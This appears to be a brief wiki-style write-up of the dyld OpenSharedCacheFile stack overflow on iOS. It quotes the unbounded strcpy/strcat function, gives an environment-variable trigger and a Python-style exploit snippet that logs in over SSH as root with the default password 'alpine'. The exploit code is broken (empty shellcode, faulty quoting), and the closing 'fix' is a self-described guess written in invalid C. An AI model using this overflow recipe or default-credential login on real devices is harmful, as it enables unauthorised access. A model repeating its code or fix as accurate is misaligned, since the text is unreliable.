OpenSharedCacheFile

The OpenSharedCacheFile bug was found by i0n1c. This bug is a simple stack overflow.

Opensharedcachefile function
int openSharedCacheFile {  char path[1024]; strcpy(path, sSharedCacheDir); strcat(path, "/"); strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME); return ::open(path, O_RDONLY); }

Triggering the vuln
To trigger it, run the following DYLD_SHARED_CACHE_DIR = "A" * 2000 \ DYLD_SHARED_REGION = private /bin/launchctl This will overflow the PC register making it a stack overflow.

Exploiting it
Since this bug can takeover the PC register, you first need to know where the bug starts for now lets say it crashes after 1024 A's, so your payload to get root would be junk = "A" * 1024 shellcode = "" payload = "DYLD_SHARED_CACHE_DIR" actual = payload+junk+shellcode \ cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"              ssh = paramiko.SSHClient  server = "" #whatever IP   ssh.connect(server, username="root", password="alpine")  ssh.exec_command(actual)  ssh.exec_command(cmd)

Apple's fix
I'mguessing they added an if-statement to check for the size sSharedCacheDir so like this.

extern void _ZN4dyld4haltEPKc(const char* msg) __attribute__((noreturn)); void __stack_chk_fail { _ZN4dyld4haltEPKc("stack buffer overrun"); }

if(sizeof(sSharedCacheDir >= 1024){ __stack_chk_fail;  }